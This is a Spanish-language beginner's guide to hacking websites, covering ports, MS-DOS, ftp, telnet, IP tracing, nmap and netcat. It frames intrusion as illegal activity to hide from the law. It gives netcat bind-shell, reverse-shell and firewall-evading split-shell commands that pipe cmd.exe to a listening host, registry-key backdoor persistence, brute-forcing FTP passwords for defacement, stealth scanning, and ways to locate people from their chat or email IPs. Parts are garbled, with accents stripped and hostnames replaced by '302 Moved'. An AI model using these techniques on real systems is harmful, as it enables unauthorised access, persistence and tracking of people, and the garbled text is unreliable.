Guia Para Hackear Webs

Embed Size (px)

Citation preview

By Krisis, Terminator609 ndice: 1....Introduccin 2......Organizacin en el mundo del hacking 2.1...Algo de tica: Los 10 mandamientos del hacker 3......Lista de puertos 4....Principales comandos del ms-dos 5......Comandos del ms-dos con relacin directa en el hacking 6......Ftp 7......Telnet 8......Ping 9......Tracert 10....Netstat 11..IP 12....Datos de la persona mediante el IP 13..Principales herramientas 14....Shadow Security Scanner 15...Netcat 16..Nmap 17..Troyanos 18Intrusin mediante NetBios 19....Intrusin mediante vulnerabilidades 20....Fuerza Bruta 21....Programacion

1_ Introduccin Buenas, soy VortheX y escribo esta gua no slo para los que se inicien en el hacking, que seguro les resultar de mucha utilidad, sino que tambin sirva de recopilacin para gente ms avanzados. Espero que os guste la gua, como es muy difcil acordarse de todo (xD) conforme me vaya acordando y me vayais proponiendo cosas ir aadiendo para hacerla cada vez ms completa. Ah, por cierto, como no domino todos los campos de esto, (imposible dominarlo todo) he aadido informacin de otros sitios, en ese caso, indico el autor. Adems de hacking, voy a tratar temas de cmo protegernos a nosotros mismos, de seguridad en general, y de programacin, una breve introduccion (muy breve) 2_Organizacin del mundo del hacking Bueno, esta parte es sobre todo para los que acaban de empezar, aunque la mayora de los user ya lo sabrn, pero la gua no estara completa sin esto. Veris, en esto no cabe todo en el mismo saco, y segn las diferentes actividades que realice la persona se pueden clasificar en los siguientes grupos:

Newbie: Es un novato, con an no muchos conocimientos generalmente, y ganas de aprender. Ojo, no debe confundirse con un lammer! Hacker: Persona con muchos conocimientos informticos, que realiza intrusiones a otros sistemas para explorar y corregir sus fallos de seguridad, o por simple curiosidad, nunca con fines destructivos. Cracker: La nica diferencia respecto al hacker es que el cracker daa el sistema o lo usa para beneficiarse de l. Un cracker tambin puede ser una persona que rompe la seguridad del software editndolo. Lammer: Es lo ms bajo en esto del hacking, son personas con poca autoestima que se dedican a creerse hackers, y lo unico que saben hacer es copiar y pegar. Suelen usar programas rastreros. Si nos topamos con alguno, lo mejor es no hacerles caso. Tambin son lammers los que intentan jackear el Hotmail de la gente. Y hasta aqu la primera leccin de esta gua. 2.1_Algo de tica

Bien, no podemos ir destrozando a todos los sistemas a los que entremos asi que hay una especie de reglas que seguir: I-. Nunca destroces nada intencionalmente en el ordenador que ests hackeando. II-. Modifica solo los ficheros que hagan falta para evitar tu deteccin y asegurar tu acceso futuro al sistema. III-. Nunca dejes tu direccin real, tu nombre o tu telfono en ningn sistema. IV-. Ten cuidado a quien le pasas informacin. A ser posible no pases nada a nadie que no conozcas su voz, numero de telfono y nombre real. VI-. Nunca hackees en ordenadores del gobierno. El gobierno puede permitirse gastar fondos en buscarte mientras que las universidades y las empresas particulares no. VII-. Se paranoico, recuerda que estas violando la ley IX-. No te preocupes en preguntar, nadie te contestara, piensa que por responderte a una pregunta, pueden cazarte a ti. al que te contesta o a ambos. Bueno, pues estan son unas reglas basicas. Ya se que faltan pero es que he borrado algunas porque estaban completamente desfasadas.

3_ Lista de puertos

Aqu teneis una buena lista de los puertos que podra tener abierto un pc. Se indican los puertos mas importantes y su servicio. Por ejemplo, el 21 es el ftp Los puertos sirven para la entrada-salida de datos de un ordenador Para intentar acceder a los puertos se hace con el comando telnet (basicamente) , que se ve ms adelante, o con una utilidad que se llama netcat, que tambin veremos luego. Por ahora quedaros con que la maquina tiene una serie de puertos abiertos y que se puede pasar y beneficiarse de su servicio por telnet, o el netcat. Nota para newbies: Se puede saber los puertos abiertos que tiene un ordenador escaneando su web o su ip con un buen escaner, como el nmap y el shadow security scanner ( o sss) que ya veremos su funcionamiento mas adelante.

echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote qotd 17/udp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver rlp 39/udp resource # resource location name 42/tcp nameserver name 42/udp nameserver whois 43/tcp nicname # usually to sri-nic domain 53/tcp nameserver # name-domain server domain 53/udp nameserver nameserver 53/tcp domain # name-domain server nameserver 53/udp domain mtp 57/tcp # deprecated bootp 67/udp # boot program server tftp 69/udp rje 77/tcp netrjs

finger 79/tcp link 87/tcp ttylink supdup 95/tcp hostnames 101/tcp hostname # usually from sri-nic iso-tsap 102/tcp dictionary 103/tcp webster x400 103/tcp # ISO Mail x400-snd 104/tcp csnet-ns 105/tcp pop 109/tcp postoffice pop2 109/tcp # Post Office pop3 110/tcp postoffice portmap 111/tcp portmap 111/udp sunrpc 111/tcp sunrpc 111/udp auth 113/tcp authentication sftp 115/tcp path 117/tcp uucp-path 117/tcp nntp 119/tcp usenet # Network News Transfer ntp 123/udp ntpd ntp # network time protocol (exp) nbname 137/udp nbdatagram 138/udp nbsession 139/tcp NeWS 144/tcp news sgmp 153/udp sgmp tcprepo 158/tcp repository # PCMAIL snmp 161/udp snmp snmp-trap 162/udp snmp print-srv 170/tcp # network PostScript vmnet 175/tcp load 315/udp vmnet0 400/tcp sytek 500/udp biff 512/udp comsat exec 512/tcp login 513/tcp who 513/udp whod shell 514/tcp cmd # no passwords used syslog 514/udp printer 515/tcp spooler # line printer spooler talk 517/udp ntalk 518/udp efs 520/tcp # for LucasFilm route 520/udp router routed timed 525/udp timeserver tempo 526/tcp newdate courier 530/tcp rpc

conference 531/tcp chat rvd-control 531/udp MIT disk netnews 532/tcp readnews netwall 533/udp # -for emergency broadcasts uucp 540/tcp uucpd # uucp daemon klogin 543/tcp # Kerberos authenticated rlogin kshell 544/tcp cmd # and remote shell new-rwho 550/udp new-who # experimental remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem rmonitor 560/udp rmonitord # experimental monitor 561/udp # experimental garcon 600/tcp maitrd 601/tcp busboy 602/tcp acctdisk 707/udp kerberos 750/tcp kdc # Kerberos authentication--tcp kerberos 750/udp kdc # Kerberos authentication--udp kerberos_master 751/tcp # Kerberos authentication passwd_server 752/udp # Kerberos passwd server userreg_server 753/udp # Kerberos userreg server krb_prop 754/tcp # Kerberos slave propagation erlogin 888/tcp # Login and environment passing kpop 1109/tcp # Pop with Kerberos phone 1167/udp ingreslock 1524/tcp maze 1666/udp nfs 2049/udp # sun nfs knetd 2053/tcp # Kerberos de-multiplexor

4_Principales comandos del ms-dos.Campaa contra el fraude Online y la Seguridad en la Red

Bien, el manejo del ms-dos es fundamental en cualquier persona interesada en el hacking, ya que en la mayora de los casos, lo que obtendremos al hackear ser el shell de la vctima. Adems, muchos de los programas principales de hacking funcionan en ms-dos, y como ms adelante veremos, para explotar las vulnerabilidades de una mquina tambin lo necesitaremos. Nota para newbies: Cuando se habla de obtener el shell de un equipo lo que nos referimos es que podamos manejar el ordenador de la vctima en modo ms-dos, por eso es tan importante el conocimiento de este sistema. Bueno, pero antes de meternos a pelo en el ms-dos, voy a hacer una pequea introduccin: MS-DOS son las siglas de MicroSoft Disk Operating System, Sistema operativo de disco de Microsoft. es un sistema operativo comercializado por Microsoft perteneciente a la familia DOS. Fue un sistema operativo para el IBM PC que alcanz gran difusin. Actualmente se halla integrado en toda la gama de Windows, includo el vista y el XP. (extraido de la wikipedia) Bien, para empezar, veamos como se abre el ms-dos: Inicio-Programas-Accesorios-Smbolo del Sistema Algunos ordenadores lo tienen deshabilitado, pero tambin lo podemos abrir de esta manera:

Inicio-Ejecutar-Command Inicio-Ejecutar Cmd Hay veces que cuando abres por primera vez el ms-dos, es probable que se abra en pantalla completa, para que se ponga normal hay que pulsar alt+intro. Bien, ya tenemos esa pantallita negra delante de nuestras narices ahora? Por defecto, el ms-dos se inicia metido en la carpeta C:\Documens and Settins\Vuestro nombre de usuario El primer comando que vamos a ver: Dir Ponemos dir, y apretamos enter, el comando dir vale para ver los archivos y carpetas que hay en un directorio, por defectoSegundo comando: CD Bien, el comando cd sirve para meterse en una carpeta del directorio donde estis. Simplemente pulsar cd Nombre de la carpeta La combinacin de los comandos dir y cd sirven para navegar por las carpetas del ordenador y los archivos: Para abrir un archivo desde el ms-dos, solo teneis que ubicaros en el directorio donde est y escribir su nombre ( con la extensin) Ej: microsoftword.exe Ahora un ejemplo de los comandos dir y cd:

Quote Microsoft Windows XP [Versin 5.1.2600] Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Pepe>dir El volumen de la unidad C no tiene etiqueta. El nmero de serie del volumen es: 78E0-3064 Directorio de C:\Documents and Settings\Pepe 05/08/2007 19:38 . 05/08/2007 19:38

.. 06/04/2007 15:25 0 AILog.txt 09/05/2007 21:48 Mis documentos 11/02/2007 13:25 WINDOWS 10 archivos 5.292.317 bytes 14 dirs 17.141.112.832 bytes libres

Quote C:\Documents and Settings\Pepe>cd Escritorio C:\Documents and Settings\Pepe\Escritorio>dir El volumen de la unidad C no tiene etiqueta. El nmero de serie del volumen es: 78E0-3064 Directorio de C:\Documents and Settings\Pepe\Escritorio 06/08/2007 21:31 . 06/08/2007 21:31 .. 10/08/2006 15:05 466 Acceso directo a DRAE.lnk 06/08/2007 11:57 675 Ares.lnk 03/08/2007 11:59 675 AtomixMP3.lnk 03/10/2006 15:38 721 Babylon.lnk 06/08/2007 23:27 06/08/2007 16:17 747 Dr. Abuse.lnk 09/08/2006 13:04 1.475 Explorador de Windows.lnk 15 archivos 224.559 bytes 5 dirs 17.141.112.832 bytes libres

Quote C:\Documents and Settings\Pepe\Escritorio>cd Carlos C:\Documents and Settings\Pepe\Escritorio\Carlos>dir El volumen de la unidad C no tiene etiqueta. El nmero de serie del volumen es: 78E0-3064 Directorio de C:\Documents and Settings\Pepe\Escritorio\Carlos

06/08/2007 23:27 . 06/08/2007 23:27 .. 19/07/2007 15:49 3.779.414 analizadores_de_archivos.rar 06/08/2007 11:57 2.017.091 aresregular209_installer.exe 19/07/2007 15:10 420.352 Assembler.doc 08/07/2007 18:05 usb 31 archivos 49.346.341 bytes 5 dirs 17.141.112.832 bytes libres

Quote C:\Documents and Settings\Pepe\Escritorio\Carlos>

5_Comandos del ms-dos con relacin directa en el hacking Bien estos comandos son tiles una vez tengamos el shell del otro pc ( si es que hackeamos para obtener la shell) pero hay otros que nos ayudan directamente a hackear y son IMPRESCINDIBLES. 6_FTP Este comando es uno de los ms importantes, ya que por ello se pueden acceder a servidores o a los archivos de las web y modificarlas (deface) Este comando se usa de la siguiente manera: Abrimos el ms-dos. C:\Documents and Settings\Pepe> Escribimos ftp C:\Documents and Settings\Pepe>ftp Ahora a enter xD ftp> Bien, ya estamos en el ftp

Ahora sera de la siguiente manera: ftp> open ipdelamaquina o pagina web Ejemplo: ftp> open 302 Moved Una vez llegados a ese punto, sera meter el user y la contrasea del pc y ya estaramos dentro. Las contraseas del ftp se pueden obtener de varias maneras, por fuerza bruta, probando contraseas y user que tengan que ver con el usuario, tambien se puede puede intentar poniendo user y pass que vienen por defecto, aunque ese truco es algo viejo. Nota: Solo las webs suelen tener abierto el puerto ftp, lo digo por si le pillais la ip de algun amiguete, que sepais que es normal que de error. El puerto del ftp es el 21 El ftp tambin se puede hacer haciendo telnet a ese puerto (21) , telnet ser el siguiente comando que veamos. 7_Telnet Telnet es el comando ms importante, sirve para conectarse a cualquier puerto de una mquina o al puerto por defecto el 23. Esto esta muy desfasado, no hay casi pcs que lo tengan abierto, pero sin saber esto no vas a ningun lado, es basico Por telnet podemos manejar el otro ordenador en modo ms-dos, es decir, que podemos obtener el shell. Para hacer telnet: Abrimos el ms-dos

Quote C:\Documents and Settings\Pepe>telnet ipdelamaquina Puerto

Tambin podemos dejar el campo del Puerto vaco solo poniendo la telnet y la ip, y se conectara por defecto al puerto 23, pero hoy en da ya no hay casi ningun ordendor con ese puerto abierto. Una vez conectados, segn que puerto, claro, te pedira el user y el pass, que tambin lo podemos conseguir por la fuerza bruta. 8_Ping

El comando ping sirve para saber si un servidor est activo. Tambin es til porque podemos saber la ip de un sitio web. Como hacer ping: C:\Documents and Settings\Pepe>ping ipopaginaweb Ejemplo:

Quote C:\Documents and Settings\Pepe>ping 302 Moved Haciendo ping a 302 Moved [66.249.93.99] con 32 bytes de datos: Respuesta desde 66.249.93.99: bytes=32 tiempo=112ms TTL=240 Respuesta desde 66.249.93.99: bytes=32 tiempo=104ms TTL=240 Respuesta desde 66.249.93.99: bytes=32 tiempo=367ms TTL=240 Respuesta desde 66.249.93.99: bytes=32 tiempo=154ms TTL=240 Estadsticas de ping para 66.249.93.99: Paquetes: enviados = 4, recibidos = 4, perdidos = 0 (0% perdidos), Tiempos aproximados de ida y vuelta en milisegundos: Mnimo = 104ms, Mximo = 367ms, Media = 184ms

En este caso el servidor est activo, ya que ningun paquete de datos se ha perdido. Como veis, tambien hemos averiguado la ip del sitio web al que le haciamos el ping. (66.249.93.99) 9_Tracert Este comando es muy util, sirve para saber por que ordenadores pasa una peticin nuestra antes de llegar al pc de destino: pe, google. Es asi:

Quote C:\Documents and Settings\Pepe>tracert ip

Despus ya saldran por los ordenadores por los que ha pasado

Puede parecer que no es mucho, pero con este metodo se puede descubrir si un ordenador se protege con un Proxy. Mediante el tracert podemos saber tambien donde tiene contratada la cuenta ( por ejemplo, telefonica) 10_Netstat Sirve para ver las conexiones establecidas Es: Netstat na Con esto aparecerian las ips que estan conectadas a nuestro ordenador ( el ares, las web) Con este comando hay un metodo para sacar la ip de alguien por el msn, lo explicar mas adelante. 11_IP

Obtener el ip de el ordenador a intentar hackear es el primer paso para lograr nuestro objetivo, ya que con ella podemos escanear su ordenador para ver los puertos que tiene abiertos y sus vulnerabilidades ( ya lo veremos mas adelante) Como ya sabis, la ip de una pagina web se puede obtener con el comando ping. Otro mtodo para averiguar la ip por correo electrnico es abrir el Hotmail, le das a opciones, opciones de la pantalla y all seleccionas el encabezado de correo o algo as avanzado. As cuando abras un mensaje, arriba saldr la ip, entre otras, del que te lo envi. Por el Messenger tambin se puede averiguar la ip de una persona. Solo tienes que enviarle un archivo, y mientras se pasa le das al ms-dos, escribes netstat na y te saldrn muchas ips, pero no te costar reconocer la de tu amigo Para este truco tienes que tener todas las ventanas de Internet cerradas, si no no va a funcionar. Tambin existe un programa para automatizar esto, se llama private ip. Bueno, ya sabemos como sacar una IP, pero ahora veamos un poco de teora. La direccin ip es el numero que identifica a un ordenador en Internet, simplemente. Pueden ser dinmicas, si cada vez que se enciende y se apaga el router cambia, o esttica, si la ip siempre es la misma. Tambin la IP puede ser interna o pblica, la que nos interesa para hackear es la pblica, que es del tipo 80.335.26.21 y parecidas, que se saca con los mtodos anteriores.

La ip interna de un ordenador nos vale para hackear si los pcs estan conectados a una red local, como una biblioteca, un instituto o una cybersala. Esta IP se puede obtener abriendo el ms-dos y escribiendo ipconfig.

12_Sacando informacin de la persona con la IP

Con una ip podemos averiguar mucha ms informacin de la que realmente creemos, localizar el lugar donde est ubicado ese ordenador y muchos datos ms Nota importante: Este texto no est copiado pero est inspirado en una pequea gua que hizo Rakion en el portalhacker hace un tiempecito Bien, lo primero que vamos a hacer va a ser localizar la IP en cuestin. Para esto tenemos una pgina magnifica, Asociacin de Internautas Solo metes la IP y le das a localizar, facil no? Que no slo dice donde est ubicada, sino que tambin lo indica en un mapa Pero eso no es todo Podemos averiguar muchas cosas como datos del servidor con un whois. Para ello nos metemos a esta pgina: NIC Mxico - Whois de IP All metemos la direccin IP, luego a buscar y nos saldr un montn de datos tiles. Esto puede parecer que no es importante para hackear, pero a partir del nombre y esas cosas se pueden averiguar users, y cuantos mas datos se tengan del ordenador apuntados en un .txt muchsimo mejor.

KMN

13_Principales herramientas

Faltan algunas, pero ya las ireis descubriendo segun las necesidades que tengis...

Aqu teneis una lista con las herramientas principales y como se usan: 14_Shadow Security Scanner ( o SSS)

Aqui teneis una captura de el SSS Esta herramienta es la primera de la lista, es el escaner de vulnerabilidades y de puertos ms usado y el mejor (con permiso del AcunetiX, que es parecido pero me parece mejor),. Lo malo es que el programa no es gratis xD a si que os lo tendris que bajar o pagar $$$$ Bien, una vez instalado sale la pantalla. Es muy intuitivo. Le damos a New Session Complete Scan, y ya vamos siguiendo los pasos, que seran meter la ip una vez dado a finalizar al acabar el proceso, para que empieze a escanear, seleccionamos la ip o la web y le damos a start scan. Una vez finalizado el escaner, a la izquierda tendremos una lista de los puertos abiertos, adems de mucha ms informacin. Si pinchamos en la pestaa Vulnerabilities nos saldrn una lista de sitios por donde podremos pasar. La importancia de las vulnerabilidades se miden por colores, las azules no tienen mucha importancia, y las rojas son crticas, que son con las que vamos a trabajar principalmente. Si pinchamos en una vulnerabilidad, abajo del todo hay un nmero, si pinchamos nos llevar a un sitio web donde nos dir a que afecta la vulnerabilidad, una descripcin e incluso el exploit para poder aprovecharnos de esa vunerabilidad. Nota para newbies: Un exploit es un cdigo, que una vez compilado en su lenguaje de programacin en el que est escrito ( normalmente c, esto se puede ver fijandose el la extensin que tiene el codigo del exploit) se abre con el ms-dos y se siguen las instrucciones para conseguir acceso a la maquina remota. 15_Netcat

El netcat es una utilidad que sirve principalmente para escanear o ver el trafico que pasa por un puerto (sniffer), tambien vale para hacer un Chat, muchsimas cosas, tambien puedes obtener el shell de otro ordenador con esta herramienta. Funcionamiento: Bien, abrimos el .exe que nos viene y nos sale una pantalla parecida a la del ms-dos y pone cmd line: Nota: Se manejar el netcat, pero ni mucho menos estoy informado de todas las cosas que se pueden hacer con el, asi que he includo este texto, pero no es mo, que conste Introduccin: El netcat para win32, es un programa que funciona en ms-dos, sin entorno grfico, y sirve para realizar conecciones de casi cualquier tipo en tcp y udp. Conviene guardar nc.exe en %windir%/command (si vas a usar nc en una versin de win anterior a winme) o en %windir%/system32 (si vas a usar nc en una versin posterior a winnt). Esto es xq en esas carpetas se guardan los comandos externos del ms-dos y de esta forma vamos a poder usar el nc como un comando externo ms. La ventaja de esto es q no vamos a tener q ubicar la lnea de comandos en la carpeta donde est guardado el nc cada vez que lo keramos usar, sino que lo vamos a poder usar dsd cualquier carpeta. Para ver la ayuda incluida en el nc tipeamos nc -h.

Principales modos de uso: client Podemos usar el nc para conectarnos a una maquina por cualquier puerto siempre que ste este abierto. La sintaxis bsica es:

{opciones} [ip/hostname] [puerto] Las opciones, como su nombre lo indica, son opcionales, por lo que si yo tipeara en mi linea de comandos: 201.234.131.38 23 Se conectara a 201.234.131.38 (fiar argentina) por el puerto 23 (telnet). Es muy recomendable usar siempre la opcin -vv para que el nc nos de informacin sobre el estado de la coneccin. Las opciones siempre van antes de la direccion ip o el hostname y el puerto (en ese orden), por lo que la nueva sintaxis nos kedara: -vv {opciones} [ip/hostname] [puerto] Las opciones que se pueden combinar con este uso son: -d (detach from console) modo oculto, en segundo plano, la coneccin sigue aunke c cierre el ms-dos -n (numeric ip only) c usa cuando c d una ip en vez de un hostname y no keres q el nc use dns para averiguar el hostname -o (hex dump of traffic) guarda todo el trafico de una coneccin en un archivo hexadecimal -p (local port number) elegs el puerto local para la coneccin -r (randomize local and remote ports) elige al azar los puertos no especificados. -s (local source address) direccin local -i (delay interval for lines sent) tiempo de espera entre lnea y lnea enviada -u (udp mode) realiza conecciones en puertos udp -v (verbose) modo detallado, usar dos veces para que sea ms detallado -w (wait) tiempo en segundos en los que la coneccin se mantendr sin que ninguna de las partes transfiera datos, x ej: si pongo -w 3 y yo o el server dejamos de transmitir datos durante 3 segundos, la coneccin termina. server Podemos usar el nc para poner un puerto a la escucha y recibir conecciones entrantes. La sintaxis bsica es: -l -p {opciones} [puerto] Donde [puerto] es el nmero de puerto que se kiere poner a la escucha. La opcin -l puede usarse en mayscula -L si se desea que luego de finalizada la coneccin, el nc siga escuchando en el mismo puerto con las mismas opciones. De otra forma, al finalizar la coneccion, el nc se cerrara Opciones adicionales: -d (detach from console) funciona en segundo plano, independientemente del ms-dos -e (inbound program to exec) ejecuta un programa al conectarse un cliente. -i (delay interval for lines sent) tiempo de espera entre lnea y lnea enviada. -o (hex dump of traffic) guarda todo el trafico de una coneccin en un archivo hexadecimal. -r (randomize local and remote ports) elige al azar los puertos no especificados. -s (local source address) direccin local -u (udp mode) realiza conecciones con puertos udp -v (verbose) modo detallado, usar dos veces para que sea ms detallado -w (wait) tiempo en segundos en los que la coneccin se mantendr sin que ninguna de las partes transfiera datos, x ej: si pongo -w 3 y yo o el server dejamos de transmitir datos durante 3 segundos, la coneccin termina. port scan Podemos usar el nc para comprobar que puertos tiene abiertos una mquina. La sintaxis bsica sera:

-z {opciones} [ip/hostname] [puerto/s] Opciones adicionales: -d (detach from console) funciona en segundo plano, independientemente del ms-dos -i (delay interval for lines sent) tiempo de espera entre lnea y lnea enviada. -n (numeric ip only) c usa cuando c d una ip en vez de un hostname y no keres q el nc resuelva el hostname -o (hex dump of traffic) guarda todo el trafico de una coneccin en un archivo en hexadecimal. -s (local source address) direccin local -u (udp mode) realiza conecciones con puertos udp -v (verbose) modo detallado, usar dos veces para que sea ms detallado -w (wait) tiempo en segundos en los que la coneccin se mantendr sin que ninguna de las partes transfiera datos, x ej: si pongo -w 3 y yo o el server dejamos de transmitir datos durante 3 segundos, la coneccin termina. Los puertos pueden especificarse individualmente, x rangos (inclusivos) o ambos en cualquier orden. A partir de sto pueden inventar infinitos usos combinando el nc con otros programas y opciones propias del ms-dos. Adems de varias opciones del nc que no expuse ac xq no estoy seguro de poder explicarlas.

Ejmplos prcticos: para conectarse a un servidor pop3 capital.cf.rffdc.edu.ar 110 para conectarse a un servidor smpt en modo detallado: -vv capital.cf.rffdc.edu.ar 25 para conectarse a un servidor ftp en modo detallado dsd el puerto local 1337: -vv -p 1337 capital.cf.rffdc.edu.ar 21 -vv -p 1337 ftp.microsoft.com.ar 21 -vv -p 1337 ftp.ar.geocities.com 21 -vv -p 1337 cablemodem.fibertel.com.ar 21 o x el cliente ftp de ms: ftp [ip/hostname] para conectarse a un servidor telnet aprovechando la opcin -t (answer telnet negociation) -vv -t freeshell.org 23 -vv -t capital.cf.rffdc.edu.ar 23 o x el cliente telnet de ms: telnet [ip/hostname] para conectarse a un servidor web en modo detallado dsd el puerto 2236 guardando el trafico en un archivo hexadecimal llamado wdeah.txt: -vv -p 2236 -o wdeah.txt www.google.com.ar 80 -vv -p 2236 -o wdeah.txt www.desertwolf.com.ar 80 -vv -p 2236 -o wdeah.txt www.fotolog.com 80 o x ms iexplorer en direccin: [ip/host] escanear puertos individualmente:

-z www.ieslenguasvivasjrf.esc.edu.ar 21 23 20 22 80 110 escanear puertos por rangos inclusivos: -z 200.123.160.225 20-23 137-139 escanear por puertos tanto especficos como por rangos: -z www.ieslenguasvivasjrf.esc.edu.ar 137-139 80 110 shell directa Mediante este comando en un windows posterior a winme -l -p 2236 -e cmd.exe -d A cualquiera que se conectase por el puerto 2236 mediante nc o telnet, le aparecera una shell equivalente al cmd.exe de la maquina en la que se ejecut el comando. Lo mismo ocurrira en un windows anterior a winme reemplazando cmd.exe por command.com en el comando anterior. shell inversa Esta tcnica es una variacin de la primera, con la diferencia que en esta la mquina que proporciona la shell se conecta a la otra pudiendo de sta forma saltar algunos routers y firewalls. Ideal para maquinas dentro de una red. Se ejecuta el siguiente comando en una maquina para ponerla a la escucha de conexiones por el puerto 2236: -vv -L -p 2236 Luego, se ejecuta el siguiente comando en la maquina que va a proporcionar la shell para que se conecte a la primera: -d -e [cmd.exe/command.com] [ip/hostname primera maq] 2236 shell inversa distribuida Est tcnica es la ms silenciosa y efectiva de todas, en sta se realizan dos conexiones inversas (una para enviar informacin y otra para recibirla) usando los puertos 25 y 80 que el firewall del win xp sp2 no filtra por tenerlos habilitados por default para el envo (25 smpt) y recibo (80 http) de informacin. Para esto abrimos dos ventanas en la maquina que recibir la shell en las que ponemos: -vv -l -p 80 y -vv -l -p 25 Respectivamente, de manera que escuche conexiones por los puertos 80 y 25. Luego, en la mquina q proporcionar la shell ponemos: nc [ip/hostname maq escucha] 80 | cmd.exe | nc [ip/hostname maq escucha] 25 Una vez realizada la conexin, se envan los comandos desde la ventana que escucha por el puerto 80 y se reciben los resultados en la ventana que escucha por el puerto 25. backdoor Para dejar al nc funcionando a modo de backdoor se pueden utilizar diversos mtodos, tales como agregar un valor alfanumrico en el registro de win en la clave hkey_local_machine\software\microsoft\windows\curr entversion\run, o agregar un lnea al autoexec.bat o al win.ini, o utilizar el comando at, el programador de tareas, etc. chat peer to peer

Se puede crear un simple chat mediante nc entre dos personas escribiendo una de ellas (server) ste comando: -l -p 1337 y la otra (client) ste otro: nc [ip/hostname de la maq dnd c ejecuto el comando anterior] 1337 La primera persona abrira el puerto 1337 para recibir coneccines y la segunda se conectara a su maquina por el puerto que la primera persona abri por lo que realizaran una coneccin directa puerto a puerto. Luego, lo que una de las personas escribiese en su nc aparecera en el nc del otro y viceversa. El autor de este texto es Franco Pyrih 16_Nmap

Quote El nmap es un escner, tambien de los ms usados en la actualidad, por sus muchas opciones y porque da muchsima informacin sobre el servidor que escanees, sus puertos, ect.

Funcionamiento bsico: El primer paso es obtener Nmap lo puede encontrar en http://www.insecure.org, existen versiones para Windows UNIX y Linux entre otros. Si esta montando el sistema en Windows requiere WinPcap en Unix requerir Libpcap. Para el caso de Windows requerir reiniciar el

sistema para garantizar que se cargue el controlador del la tarjeta. Una vez ha instalado la herramienta es hora de utilizarla, el primer scan puede ser relativamente simple as: nmap 192.168.1.1 Esta salida es la que podr ver en sus sistema: $ nmap 192.168.1.254 Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-06-05 15:08 EDT Interesting ports on 192.168.1.254: (The 1661 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 21/tcp open ftp 80/tcp open http Este scan es muy bsico puesto que no se han definido ninguno de los parmetros del sistema es apropiado decir que la salida es lo suficientemente clara, nos indica que puestos estn abiertos, ahora si queremos mas informacin debemos hacer uso de parmetros dentro del sistema. En este punto vamos a ver una opcin bastante comn de scan que le permite hacer el registro de servicios abiertos de forma discreta (sin registro en los Logs del sistema) $ nmap sS 192.168.1.1 Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-06-05 15:40 EDT Interesting ports on 192.168.1.1: (The 1641 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 21/tcp open ftp 25/tcp filtered smtp 42/tcp open nameserver 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 514/tcp filtered shell 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1026/tcp open LSA-or-nterm 1027/tcp open IIS 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-term-serv 6666/tcp filtered irc-serv 6667/tcp filtered irc 6668/tcp filtered irc Nmap finished: 1 IP address (1 host up) scanned in 135.733 seconds El truco detrs de este tipo de scan es que debemos lograr pasar lo mas inadvertidos en el

proceso puesto que de lograr hacer el barrido de puertos la mayora de los Firewall van a intentar evitar el reconocimiento algunos de los sistemas detectan el barrido de puertos por medio de el anlisis de los requerimientos a los puertos de forma muy rpida. Cabe resaltar que existen varios tipos de modificadores de scan lo mas importante es lograr identificar la combinacin mas apropiada, los modificadores que se pueden utilizar para realizar el scan son los siguientes: $ nmap sT 192.168.1.1 $ nmap sU 192.168.1.1 $ nmap sA 192.168.1.1 $ nmap sX 192.168.1.1 $ nmap sN 192.168.1.1 $ nmap sF 192.168.1.1 $ nmap sP 192.168.1.1 $ nmap sV 192.168.1.1 Veamos que significan estos modificadores sT se intenta hacer un barrido de puertos por TCP la ventaja de esta tcnica es que no requiere usuarios privilegiados, opuesto a sS sU se intenta hacer un barrido de puertos por UDP, es til cuando se intentan descubrir puertos de nivel superior que pueden estar detrs de un firewall, lenta pero permite hacer auditorias mas exactas. sA se usan mensajes de ACK para lograr que sistema responda y as dterminar si el puerto esta abierto algunos Firewall no filtran estos Mensajes y por ello puede ser efectivo en algunos casos. sX puede pasar algunos Firewall con malas configuraciones y detectar servicios prestndose dentro de la red sN puede pasar algunos Firewall con malas configuraciones y detectar servicios prestndose dentro de la red sF puede pasar algunos Firewall con malas configuraciones y detectar servicios prestndose dentro de la red sP este modificador ayuda a identificar que sistemas estn arriba en la red (en funcionamiento) para luego poder hacer pruebas mas especificas, similar a Ping. sV intenta identificar los servicios por los puertos abiertos en el sistema esto permite evaluar cada servicio de forma individual para intentar ubicar vulnerabilidades en los mismos. sO con esta opcin se identifica que protocolos de nivel superior a capa tres (Red o Network) responden en el sistema, de esta manera es mas fcil saber las caractersticas de la red o el sistema que se intenta evaluar. Adicionalmente a las opciones de scan se pueden especificar opciones que permiten explotar mas aun la herramienta, dentro de las opciones que mas frecuentemente se usan estn las de evitar el Ping o mostrar todos los resultados en pantalla al mximo detalle, veamos cuales son estas opciones: vv hacer la salida de la herramienta detallada en pantalla f habilita la fracmentacion de esta forma es mucho mas complejo para un un firewall u otro tipo de sistema lograr hacer el rastreo. oN redirige la salida a un archivo

oX redirige la salida a un archivo XML stylesheet con esta opcin se usa una hoja de estilo que hace mas fcil la lectura de la salida en XML P0 indica que no se debe hacer ping a los sistemas objetivo antes de iniciar el anlisis til para evitar el bloque en algunos Firewall p se usa para especificar puertos de anlisis o rango de puertos. T se usa para especificar la velocidad general del scan de esta forma se puede pasar inadvertido en algunos sistemas que detectan la velocidad de los paquetes entrantes. Texto extrado de www.dragonjar.us

NOTA IMPORTANTE: Para abrir el nmap, teneis que abrir el directorio donde lo teneis metido ( descomprimido, claro) con el ms-dos (ya sabis, usando dir y cd) y luego nmap mas las opciones. 17_Troyanos.

Esta parte es importante

